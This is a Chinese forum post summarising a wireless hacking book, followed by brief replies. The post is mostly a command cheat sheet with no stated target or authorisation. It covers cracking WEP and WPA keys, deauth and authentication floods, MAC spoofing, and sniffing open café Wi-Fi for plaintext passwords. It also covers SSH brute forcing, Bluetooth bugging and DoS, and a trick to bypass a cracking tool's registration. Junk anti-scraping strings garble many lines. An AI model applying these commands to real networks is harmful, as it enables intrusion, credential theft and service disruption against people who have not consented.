搜索
格西欧解决方案
ubnt主板
查看: 8440|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

29

主题

0

听众

3701

积分

少校

Rank: 5

签到天数: 13 天

[LV.3]偶尔看看II

UID
66587
帖子
1340
威望
7
荣誉
6
金币
2223 元
最后登录
2014-7-24
注册时间
2008-11-14
在线时间
431 小时

灌水天才

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
/ }7 G7 l4 b( x* y; }, z: _9 B# Z2 N( A- C
以下所有操作均在BackTrack 4中进行。
$ t/ r( W* I6 @" n0 ?. g% C. a# H+ G  s+ c! v

0 K6 n# X& d/ ~, f+ P( F4 Y$ i4 X1 I* h无线WEP加密P解:/ \2 _& x7 G0 z( l8 e- S3 k

& ~* b3 ~4 D( t6 C6 n5 u8 t/ M注入P解:) f( U0 L1 M7 g2 f7 K, N
% O' |# X0 L7 B' l! s2 ~
ifconfig# m  D9 c% |& b
* x! R  N, [2 k/ y
ifconfig –a/ ~8 L. U# H7 t: {

6 l5 j. y2 |3 k0 }. d( ~/ g" wifconfig wlan0(无线网卡) up
; ^: [% q6 U1 l
7 ^" B' h7 ^& H# x: _6 uairmon-ng start wlan0
1 g6 O( y; X& P. P% V. \2 n( t$ p7 e0 ^8 X
airodump-ng mon0
( I* f! u3 V! F2 J* W% R3 e, ]8 w. s$ C; F/ o& K
airodump-ng --ivs –w ivsfile –c 频道 mon0或- }* }8 H% C4 r$ g8 y

# Z1 ?9 ^  O* {6 f7 d. r7 ]4 lairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
6 ?- E1 B: t* J; i- v6 i( I# B# o; ~# C5 D  @' p* N
aireplay-ng -3 –b BSSID –h Station mon0
7 K) Q1 h" a  s5 M, J
+ j, G$ s2 t* L0 p8 Naircrack-ng ivsfile-01.ivs8 ^% i7 x5 }/ B% g" N# @/ ^
! E* D' s& h' |# D7 W; R4 B
虚连接P解(适用于无客户端连接APP解)
: x1 }8 a" g* G2 L- ?" E, Z4 E2 J  U2 J6 t* p. I2 f$ S
ifconfig) R/ E3 M3 N1 C/ ?

& p) ^3 S6 y) M  o' J+ xifconfig –a* C. O) r$ w! y  f
8 |. e% D3 p& M9 {% y
ifconfig wlan0(无线网卡) up$ S% |0 Z/ H: u

$ Q! w" S$ f: r; H' u) @airmon-ng start wlan0( Z4 c/ i- U5 g5 G& N

  j- h1 D$ a- A9 ^' m3 p! r8 Wairodump-ng mon0+ e/ z3 C& X' m+ c
/ x9 p$ @* U3 F. C2 y8 H) [( h
airodump-ng --ivs –w ivsfile –c 频道 mon0或8 F" b. W6 [: ~8 e

8 O+ B5 c9 T+ N( A! Bairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
; q9 M! \) |$ ^+ a/ P; N* O$ J5 [3 g- P8 b) u! z
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0; o0 B9 }  X5 t1 ^/ P

6 Q: s3 L5 ?8 j+ M7 \3 Z) L) Haireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
6 @; |$ H4 v1 J5 Q3 \! s& y2 X
  {  C( B% d8 d/ ?3 paircrack-ng ivsfile-01.ivs
; O5 H/ v- Y5 Q; y, \* g. @* T0 X9 E
, x1 i- e# }4 J* S- P  v& ]! ^$ Z1 H5 ]. a' P9 b
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
( }7 o1 Y7 Y& ~: P# N" a+ p. {2 T6 O$ }1 R; O0 h

: O5 `9 b" c- X8 F% D. WWPA-PSKP解! d& ^/ M2 w2 v1 ]
3 N/ l2 V( U/ J8 j: L0 H
ifconfig
0 _' ^; p! ?, F: i2 Y. H2 o4 L& ~- x0 t6 e/ E, r! o. _
ifconfig –a
! p. h. A3 K5 f3 c
% u; |& v; ?9 Mifconfig wlan0(无线网卡) up6 ]9 m( z/ G& e8 Y
0 F! m9 ]& l5 X/ y  n7 f2 G- d
airmon-ng start wlan0
# N+ `2 j( N& |9 s& E3 J6 T9 _4 ]; `  [+ D4 h
airodump-ng mon0- i! s; D8 z! O2 y. e6 A: n
' T& H( w; g& _6 O9 ~+ S5 N$ _2 p
airodump-ng –w capfile –c 频道 mon0+ h3 j  E* v) O! u1 M$ y

* v1 X2 M2 k; q7 |, n2 e( _aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包/ q. {& O) r3 z. o4 A: q5 H6 d
6 t+ q% L9 c2 L$ }0 L" E
aircrack-ng –w Dic capfile-01.cap或. l, ~  R. f. s- w2 C, ^
- O; a" n( {- W* S
cowpatty –f Dic –r capfile-01.cap –s SSID4 n) m) g* g7 ~" D1 P6 m
7 r1 l1 f+ z  x3 N) k- o( P; r: d
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID7 U7 U  X' a" B9 @9 a4 v! u, p

) S# u$ S3 L/ j% p傻瓜式P解软件SpoonWPA。
% K! R0 D. _8 r8 x. n/ b9 H
7 D5 {, F; ?/ f5 M7 LBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst& g! t. @8 A# o
4 q# Q9 q* M: s/ f" g

% i+ K9 N$ |% E5 Q, A8 L字典文件的生成和上传
0 e# P$ a0 \* F/ ^( N+ B( C6 q- k; j+ ^- \% P) a; ~
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
- Z' i7 k6 i5 ]; R; A+ H5 v; a8 J/ m, Y% M. Q+ f2 J
% n- Z1 h+ E$ k5 K7 A5 C/ C
BT4下开启Tftp:Services—TFTPD—start TFTPD1 q; D8 I' K( X, m( y

3 A& [/ l: l" U1 j( e( k  ?% X$ W. J在Windows的CMD中运行 tftp –i IP put **.dic9 r1 p; Y1 N* l& H- V1 B
! C" r8 Q% q  G
* M5 Y5 A) w; F% r
BT4下开启SSH:Services—SSH—start SSH
& v1 t" `0 t# G- w1 Y2 `3 N7 _& T1 {/ X3 m+ N+ ?: q
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root. D# [3 o4 o! A) t

$ j. Q" i* G+ y. v1 r- A( w
5 F6 @( L& y: B6 H. r2 QAP限制MAC时的解决
: D2 B! {/ `# b. f! _! I
- W* B' q* N& P" P/ s  c8 L2 B6 ]当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
+ D* Y6 ~9 S5 [$ {
$ g  h, o; S1 t. {ifconfig wlan0 hw ether NewMAC
- S, H8 P% t8 ?9 f$ w
- L, Y/ t1 F# \0 i2 P  h. v
& {% V7 j/ t9 p" @$ q关闭SSID广播的AP探测:
4 j- N$ D$ V1 Z& u  `& f; o. n7 `7 i
. g: N' a) h$ P6 J+ F  G$ w+ j5 z1.     Deauth攻击:1 G. J& X9 L  K: m4 R! x
0 p" q0 |( S1 c1 l
airodump-ng mon0: Q& ]& J  k. K. S- y% Y

; X  y! l. H  U/ Gaireplay-ng -0 10 –a BSSID –h Station mon09 L1 ~" d: D5 R" E+ k
" L$ F8 ^( [0 s3 r: k
2.     抓包分析4 k2 J9 `: {8 p. e6 ?' B4 h
5 a* D% D+ o+ y3 o3 Q
Omnipeek* j' ]' v+ j8 Y
5 I% x& o6 d, Y, Z3 A
Tcpdump –n –e –vvv –i 网卡名
3 K: \+ l4 Q( i3 S; Y) x+ T) p3 o# R  T- ]
3.     暴力P解  P2 e! D  ]' ]$ d. w$ B4 ~# q" s1 V
: o* P4 K4 U8 g4 L
Charon 1.1暴力P解% X3 `$ r- g# T8 n) ?
/ j  g5 }$ t1 {9 s" \
3 N  c6 ~& h2 A; H1 c
无线加密数据包的解密# F) z$ g, h6 }2 ^2 j

5 A! e8 h: B8 k( Q( @( {: z" V6 b6 U0 y; n, W' X/ t* e
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。* L  ^+ u7 X5 Q" `; ^& a& ~

& ]# h, f" s+ ~6 H9 q+ eFilterNS     DNS解析数据包  U/ V5 M9 ~9 m  B' |

% H- I' d/ g) [1 \* p9 FFilter:HTTP    WEB访问数据包
& h2 {5 C2 ?" M0 m: H- h/ `0 [( r( z. I5 ^% Y5 D1 s& O
Filter:msnms   MSN9 P2 Z; J( |1 Y/ G2 `! i' R
- _! q7 w) g$ r; ], O
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
9 z, [8 H: W! C; M7 Z1 W: u
4 L9 |/ n- Q9 z; t使用airdecap-ng解密:) P# _" |0 f8 Q5 Q  n* [
; d( T3 l. x! k, I
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
- _. R1 x' _9 g& [& v( P$ G/ M: f) ]. X; u: M6 l7 ?

0 h. ~7 Z* g. r: e9 {咖啡馆中无线数据截取(开放式无加密AP), e# Q% U( \" p! Y8 h# G0 u
2 Z0 B9 p) O; ^
1.Airodump-ng –w data –c频道 mon0
9 I! A6 z; y# r: q3 h
, V3 U& \( C& l) M5 B0 J, `2 r4 p2.使用WireShark打开分析
* Y6 f; B1 l7 {6 _5 a+ p/ b$ ~4 l8 {5 _; d
/ Y/ l7 Z4 F# L+ z6 i
BT4下的渗透工具:# [! c# F& X; ^# u- Q& ?

) z  A8 |" u7 L4 \' D" d; snmap –sP IP/24        判断C段下存活的主机 & l: G0 u; O9 W1 l% G

" v, w# E4 J: ]. ^3 Y) Vnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放: d5 r4 G4 P4 r5 T

, G6 [2 ?3 j, F) I) o: snmap –vv –sV IP –p port   指定端口的详细信息。。。
. v% M& j, o. H. c
0 a- e8 E# W) j1 _7 Gnamp –O IP/24    判断主机的系统版本
4 J) }& |! e/ O4 L
2 y; v' ~6 A+ q. L7 i
5 R% y3 ^* T& M! U7 qGUI 版nmap:Zenmap ' J/ |1 D1 Z) ^* Z4 c
* r4 s5 U# J+ `2 |

, h/ [" Q1 Z  N# ~0 }/ i% [Amap使用:amap –B IP port
# l0 J9 L& o0 b/ U; ]0 L+ x$ ?- ~) D9 B# V& D9 j. A
Nbtscan(扫描Windows网络NetBios信息):
4 B$ k* z* H9 x! N2 F  _3 n! u7 R  T- B6 N) d
nbtscan –v –s : IP/24
  o) D/ ?% t7 g5 R, s
" p) s* F4 T( P* h. s/ Znbtscan –r IP7 q/ y& F6 c# u, P( q1 ?; e8 o2 y. l! l% x

. L/ K1 e1 n6 f8 _, V
! V$ w0 r  G/ N# oDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
3 }# `# m- U6 q  [. J
) H0 E& d$ y; ~. Z) ]$ E
8 j/ m* W( v. R- |; p/ U  JHydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
* w; w7 |7 `! ~2 Y% r' c0 t4 T" W/ Z) h
BruteSSH: ./bruthe.py –h IP –u Username –d Dic
$ H: B7 I3 i2 C6 w# h% G9 B0 [$ a. c1 h, C; M
Metasploit3使用
% g4 G+ R1 o# w6 h/ a8 j% X无线D.0.S
  j& m' A6 g( K4 F' q- t
/ y$ W! v! q. ]% V# l1 n2 _# E$ W, \4 T" ~0 j5 z) m
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
9 R: p# h; Z8 T3 R2 D0 F, T7 Z# }, G0 h* t
airmon-ng start wlan0
' N0 ~7 m3 C. B+ G, M" {% D- Y& G( y- H6 g! I
airodump-ng mon0
7 Q: _( L4 L; T7 M- G! [4 e2 Y
6 l# t6 V4 D! \: [/ ^: J# x1 _mdk3 mon0 a –a BSSID5 M: U! E% v; E% Q+ ?: o( j+ s
; X4 I% Q& j+ w, {4 v7 M+ R) t: F
对所有的AP攻击:mdk3 mon0 a
9 |, k! o! z7 c# z: z- K0 Q( i( ?" z' _  |
- \, D% R& [! @/ w- G5 i
Deauth Flood 攻击
( a% D3 x2 h" p$ e* v$ d# [# {4 v# C% m5 v8 H, @5 q
mdk3 mon0 d –c Channel
; s1 ]  H; G$ b3 u# x! C; J# Y. L2 N
图形化D.O.S攻击:Charon  w) {! n! n3 {; P, \- J, H

$ p! L2 V/ ^' g! M# K$ f( W$ s
& x/ O( O3 I- H& P当受到攻击时,使用Wireshark抓包可以看到异常信息。
0 F; R0 d7 V/ k; v  Z; g. D
/ q" @! G2 K8 ~+ }  m
# J! q, _# I- x4 j% KWPA-PSK高速P解2 y$ \8 E# \6 I: h
% w4 s% P; e  D' j( K# a; D
1.       WPA-PSK PMK Hash TablesP解
5 g& e, i5 h9 E- T& G# t" e
  F2 M% X: e  B. K$ L8 @. L0 Y  {- kCowpatty –d HashTable.hash –r ***.cap –s SSID9 `) u/ g; m! [) i: {/ A

, e% \3 ~; N6 ]; P8 CHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID/ t  I9 o0 g' \7 J7 r

) n' M8 _8 }9 r2 I6 r: R2.       GPU辅助高速P解8 [6 p1 R" R  |! m: }

1 M1 }0 }; G: j" G使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。' h$ f' k2 b0 G- S- ?+ a
8 \& G! U3 {" c! J
3.       分布式P解  w* Y* P* r) J) i! w9 q8 {7 v
+ a9 ]/ W) S- u0 i  O
" s9 n% H2 {0 D) F5 l  ?+ J4 _
AP的伪造
4 z4 [" u% |$ O) b# O
/ R7 Y2 P5 `" j$ N/ p- d把AP的MAC改成目标AP的MAC; n: C) i5 I/ d3 {0 n$ t

6 {) X1 w: \4 U2 M. k, H) L- u+ {* ?网卡软AP- d7 w" t2 ~3 v3 h
# d* T5 ^# ]5 M+ a4 u- h# L5 q, v

& |! s8 i" S6 j9 |伪造大量虚假AP信号:
: z& k8 L. g  k' H3 w4 ~- f
2 v# B  l4 B) I8 S0 U6 K+ Z随机SSID:mdk3 mon0 b –g –c 频道 + O) B  O: T# Y+ T* K9 s- U

# I2 w, B/ E8 l( U3 _$ x指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
; P/ m: T; g1 ?% _# }% `& L: S  I! E6 @* B* ~% {$ H

2 y- Q: X5 f" |! q1 T% [War-Driving! H4 W4 Y* J& I: n7 {# i) n

4 ^2 l9 ^9 G& b8 {1 y" n热点地图绘制/ h6 a. e3 b, v* s

$ z' ^& }- d+ o7 `( K/ x) v8 F( w& rWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
5 _* S. G9 a2 W/ Y# d3 d8 i) @& t* u2 G: _- u- g8 @) W' k% l
2 q' H8 s( q" E  g* f
Netstumble
3 P7 m8 w! x- V; S, H" M* \6 m+ q* u

2 Q  \! l+ a; v  Y2 F* w) `蓝牙Hacking9 @& Y+ F' a/ o$ ~6 C- J  x

! H# [% A% l+ {6 p5 k$ _8 UWindows下的Blue Soleil工具
7 j: B# _, \1 c
' Y7 ^& v' q+ v* U9 BBT4:
. f4 T) z( L' U, {! Q. r6 l& L; c. _
hciconfig 查看蓝牙适配器
$ j9 `  P- Y" D' w7 [9 P1 u
& e8 Q, g! h( i% N' z" ohciconfig hci0 up 载入蓝牙适配器
9 P9 K$ t; x% Z% a3 X6 A0 U: U, S
1 w! G5 g& z. ghciconfig hci0 class 蓝牙适配器详细信息# z* }4 \1 S6 E
! ^) x! f$ G# Q0 @3 U3 v$ n
) |/ V4 A/ ]) n! t" Q
hcitool(扫描蓝牙)  p, d8 x! o& s" _/ a- L
. X; a  q5 R) n7 ?
hcitool –i hci0 scan
$ }) P# A) F# F6 C& F* s
! G3 W9 E4 z8 _2 ~+ y$ `: \$ yBTscanner(扫描蓝牙), r$ y) w  n4 p- r

/ H; Y8 x* A. G0 t# X  |# C
9 F5 |! z- @0 n+ s2 |. N蓝牙攻击:
6 s) u8 G7 n. Y4 f, j
& @6 C4 }' i$ |/ T( _BlueBugging (适用于BlueTooth V1.1的手机)- p5 i2 }1 S2 V( H2 @+ t) {
+ u/ q* l$ I( g& I9 M
Bluebugger工具:
+ Q; D6 S4 I& E% c. U# i; C" x% l
/ [. F, [- s+ v) vBulebugger –a HD_Addr info8 H6 S5 r3 E$ y8 C& F* H, S

/ R/ i6 k  S( S
) s+ z" K% |% e( q, KBlueJacking
/ ~) g3 G# E1 L& l/ Y
' J* a2 a# f) e7 j1 ^实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。- F2 U8 U0 `) Y! O' T9 r0 F
; w' X9 }  h9 i9 C* \) A( T

! j$ p" o8 A- i# q+ W5 LHD_Addr修改:! H9 \6 S7 s5 S0 T+ A* j1 ?

* v! K- t" ~7 }% k; tBdaddr工具
; W- v0 u6 \* w& M( _" z8 I4 Y$ w. F0 v- t& o, J6 i: r
bdaddr –i 蓝牙设备名 新HD_addr9 l; W+ E( i2 R- f' q- j
0 X* I$ q: J) _6 v

- V2 p% @* `0 r5 v; y: J& C, J- g9 A蓝牙D.O.S; @: r; I) }. r( |

9 T) G0 S, S: e" M; Dl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
  Y* v0 n3 J; m4 F7 |) i, O
, f7 B# Y5 S# I( Vhciconfig0 Z' f" U, H3 J( {' ^5 Y
0 n; E- c  w# [9 ?! Z
hciconfig hci0 up
5 z2 L. ^  w. m) ]" ?$ W3 }
! k4 `! ]6 ~( S4 F8 n5 p% }hcitool –i hci0 scan+ G( N0 _2 n+ K

6 c, u- T  P$ M- F0 Vl2ping –s 10000 –目标MAC! Z1 F% `2 c! h6 a6 O/ q$ e* v* s3 ~

$ s: ]+ A: ?- L
2 H+ V; I2 x7 ?+ [9 d6 y不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
8 {+ ^  H$ z5 ~1 H7 n/ K# v9 b5 o7 w/ W$ o. Q$ l
./fang –r ************-############ -s) B& E4 I. y0 K7 R* K! c! u4 p
7 R! d* g6 r7 F' n; l- I1 N, U( t( F
暴力P解************-############的蓝牙设备8 p8 p  [& J! Q. S$ T) v( L
6 q0 y& u- L* v& I
./fang –l 各厂商BD_Addr分配
* |7 C6 k6 e8 f4 @; r
: p6 u4 }' v2 L" q) ]' a4 @' p# Z% Q" P% ~; k
WifiZoo使用
$ o8 v$ I: P8 a2 E4 c- w( n6 d/ D
. ]# P" ]9 G9 r  u% F1 m* H./wifizoo.py –c Capfile
7 Q/ n1 o. }) [
( ]+ P4 w* q* j5 U* O访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情
2

查看全部评分

5

主题

0

听众

880

积分

中尉

Rank: 3Rank: 3Rank: 3

该用户从未签到

UID
177172
帖子
182
威望
0
荣誉
0
金币
648 元
最后登录
2010-8-13
注册时间
2009-10-19
在线时间
49 小时
发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
http://tlwxs.wanye68.com/ 欢迎光临
回复

使用道具 举报

0

主题

0

听众

149

积分

上等兵

Rank: 1

该用户从未签到

UID
73201
帖子
56
威望
0
荣誉
0
金币
82 元
最后登录
2010-8-23
注册时间
2008-12-18
在线时间
9 小时
发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

15

主题

1

听众

2265

积分

少校

Rank: 5

签到天数: 2 天

[LV.1]初来乍到

UID
131983
帖子
391
威望
8
荣誉
0
金币
1823 元
最后登录
2013-6-20
注册时间
2009-7-5
在线时间
113 小时
发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

5

主题

0

听众

1128

积分

上尉

Rank: 4Rank: 4Rank: 4Rank: 4

该用户从未签到

UID
220541
帖子
549
威望
0
荣誉
0
金币
500 元
最后登录
2011-10-13
注册时间
2010-1-28
在线时间
20 小时
发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

0

主题

0

听众

251

积分

少尉

Rank: 2Rank: 2

该用户从未签到

UID
225826
帖子
114
威望
2
荣誉
0
金币
121 元
最后登录
2013-6-16
注册时间
2010-2-6
在线时间
56 小时
发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

1

主题

0

听众

760

积分

中尉

Rank: 3Rank: 3Rank: 3

该用户从未签到

UID
33225
帖子
71
威望
0
荣誉
0
金币
685 元
最后登录
2013-6-24
注册时间
2008-3-8
在线时间
36 小时
发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

7

主题

0

听众

679

积分

中尉

Rank: 3Rank: 3Rank: 3

该用户从未签到

UID
231470
帖子
268
威望
4
荣誉
0
金币
356 元
最后登录
2014-7-6
注册时间
2010-2-20
在线时间
350 小时
发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

0

主题

0

听众

107

积分

上等兵

Rank: 1

该用户从未签到

UID
218547
帖子
57
威望
0
荣誉
0
金币
28 元
最后登录
2010-2-26
注册时间
2010-1-25
在线时间
13 小时
发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
8 ?; b6 Z) y8 e7 \$ B借来看看。
回复

使用道具 举报

1

主题

0

听众

156

积分

上等兵

Rank: 1

该用户从未签到

UID
130083
帖子
55
威望
0
荣誉
0
金币
99 元
最后登录
2014-2-24
注册时间
2009-6-29
在线时间
18 小时
发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
* X: q- m6 r3 d8 n* s% d呵呵 其实也不贵 21块 快递再一点/ n: a7 @( |* W1 o- s
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

4

主题

0

听众

487

积分

少尉

Rank: 2Rank: 2

该用户从未签到

UID
212234
帖子
298
威望
1
荣誉
0
金币
130 元
最后登录
2012-6-15
注册时间
2010-1-14
在线时间
105 小时
发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

0

主题

0

听众

167

积分

上等兵

Rank: 1

该用户从未签到

UID
234486
帖子
23
威望
0
荣誉
0
金币
133 元
最后登录
2011-8-28
注册时间
2010-2-25
在线时间
7 小时
发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 成为会员

QQ|手机版|Archiver| 中国无线门户 ( 粤ICP备11076993 )     免责声明

GMT+8, 2014-7-25 21:40 , Processed in 0.229534 second(s), 32 queries , Gzip On.

Powered by Discuz! X2.5

© 2003-2013 广州威思信息科技有限公司

回顶部